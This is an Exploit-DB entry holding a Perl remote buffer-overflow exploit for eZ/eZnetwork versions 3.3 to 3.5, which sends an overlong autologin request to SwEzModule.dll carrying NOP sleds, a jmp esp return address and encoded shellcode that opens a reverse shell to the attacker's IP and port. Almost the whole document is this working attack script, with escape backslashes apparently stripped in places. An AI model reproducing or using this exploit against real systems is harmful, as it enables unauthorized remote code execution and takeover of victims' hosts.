https://www.exploit-db.com/exploits/23417

漏洞细节尚未披露

//source: http://www.securityfocus.com/bid/9167/info
//
//A problem has been identified in the handling of some types of requests by the eZ package, resulting in a buffer overrun. Because of this, it may be possible for a remote attacker to execute arbitrary code and gain unauthorized access to a vulnerable host. 

#!/usr/bin/perl -w
######################C###O###R###O###M###P###U###T###E###R######################
#   [Crpt]  universal eZ v3.3 < v3.5 remote exploit by kralor  [Crpt]   #
#-------------------------------------------------------------------------------#
# versions tested & not vulnerables: v3.0 v3.1 v3.2             #
# versions tested & vulnerables: v3.3 v3.4 v3.5                 #
# Cryptso.dll contains a 'static' jmp esp in eZnetwork pack from v3.3 to v3.5   #
# It is a trivial exploit, jumping to esp, then at esp we jump backward to      #
# finally reach the shellcode. The shellcode gives a reverse remote shell.      #
# Universal shellcode coded by kralor with the PEB technic.         #
######W###W###W###.###C###O###R###O###M###P###U###T###E###R###.###N###E###T######
use IO::Socket;

    print "rnt   [Crpt] eZ v3.3 < v3.5 remote exploit by kralor [Crpt]rn";
    print "ttwww.coromputer.net && undernet #coromputerrnrn";

if(@ARGV<3||@ARGV>3) {
    print "syntax: ".$0." <victim> <your_ip> <your_port>rn";
    exit;
    }

    print "[+] Connecting to ".$ARGV[0]."t...";

    my $sock = IO::Socket::INET->new(Proto=>'tcp',
                               PeerAddr=>$ARGV[0],
                               PeerPort=>"80");
if(!$sock) {
    print "Errorrn";
    exit;
    }

    print "Donern";

# 0xffe4    jmp  esp in Cryptso.dll (v3.3 v3.4 v3.5 @ 0x1004C72B)
# 0xffffedffe9  jmp  back ( $ - 4'608)

$eip        = "x2BxC7x04x10";
$jmp_back   = "xE9xFFxEDxFFxFF";
# universal reverse remote shell using PEB, coded by kralor.
$shellc0deI = "xebx02xebx0fx66x81xecx04x08x8bxecx83xecx50xe8xef".
          "xffxffxffx5bx80xc3x10x33xc9x66xb9x9ex01x80x33x95".
          "x43xe2xfax7exe6xa6x4ex26xa5xf1x1ex96x1exd5x99x1e".
          "xddx99x1ex54x1exc9xb1x9dx1exe5xa5x96xe1xb1x91xad".
          "x8bxe0xd9x1exd5x8dx1excdxa9x96x4dx1excexedx96x4d".
          "x1exe6x89x96x65xc3x1exe6xb1x96x65xc3x1exc6xb5x96".
          "x45x1excex8dxdex1exa1x0fx96x65x96xe1xb1x81x1exa3".
          "xaexe1xb1x8dxe1x9fxdexb6x4exe0x7fxcdxcdxa6x55x56".
          "xcaxa6x5cxf3x1ex99xcaxcax1exa9x1ax18x91x92x56x1e".
          "x8dx1ex56xaex54xe0x08x56xa6x4exfdxecxd0xedxd4xff".
          "x9fxffxdexc6x7dxe9x6ax6ax6axa6x5cx52xd0x69xe2xe6".
          "xa7xcaxf3x52xd0x95xa6xa7x1dxd8x97x1ex48xf3x16x7e".
          "x91xc4xc4xc6x6ax45xa6x4ex1cxd0x91xfdxe7xf0xe6xe6".
          "xffx9fxffxdexc6x7dxdex6ax6ax6ax1exc8x91xa6x6ax52".
          "xd0x69xc2xc6xd4xc6x52xd0x95xfaxf6xfexf0x1cxe8x91".
          "xf3x52xd0x91xe1xd4x1ex58xf3x16x7cx91xc4xc6x6ax45".
          "xa6x4exc6xc6xc6xc6xd6xc6xd6xc6x6ax45x1cxd0x31xfd".
          "xfbxf0xf6xe1xffx96xffxc6xffx97x7dx93x6ax6ax6axa6".
          "x4ex26x97x1ex40xf3x1cx8fx96x46xf3x52x97";
$shellc0deII    = "xffx85xc0x6axe0x31x6ax45xa6".
          "x4exfdxf0xe6xe6xd4xffx9fxffxdexc6x7dx40x6bx6ax6a".
          "xa6x4ex52xd0x39xd1x95x95x95x1cxc8x25x1cxc8x2dx1c".
          "xc8x21x1cxc8x29x1cxc8x55x1cxc8x51x1cxc8x5dx52xd0".
          "x4dx94x94x95x95x1cxc8x49x1cxc8x75x1exc8x31x1cxc8".
          "x71x1cxc8x7dx1cxc8x79xa6x4ex18xd8x65xc4x18xd8x39".
          "xc4xc6xc6xc6xffx94xc6xc6xf3x52xd0x69xf6xf8xf3x52".
          "xd0x6bxf1x95x1dxc8x6ax18xc0x69xc7xc6x6ax45xa6x4e".
          "xfdxedxfcxe1xc5xffx94xffxdexc6x7dxf3x6bx6ax6ax6a".
          "x45x95";
my $tip     = inet_aton($ARGV[1]);
my $paddr   = sockaddr_in($ARGV[2], $tip);

$paddr=substr($paddr,2,6);
$paddr=$paddr^"x95x95x95x95x95x95";
my $rport=substr($paddr,0,2);
my $rip=substr($paddr,2,4);

$request    = "GET /SwEzModule.dll?operation=login&autologin=".
          "x90"x100 .$shellc0deI.$rport."x96x46x52x97".$rip.$shellc0deII.
          "x90"x4103 .$eip."x90"x4 .$jmp_back." HTTP/1.0rnrn";

    print $sock $request;
    print "[+] Sending evil requestt...";
    close($sock);
    print "Donern";
exit;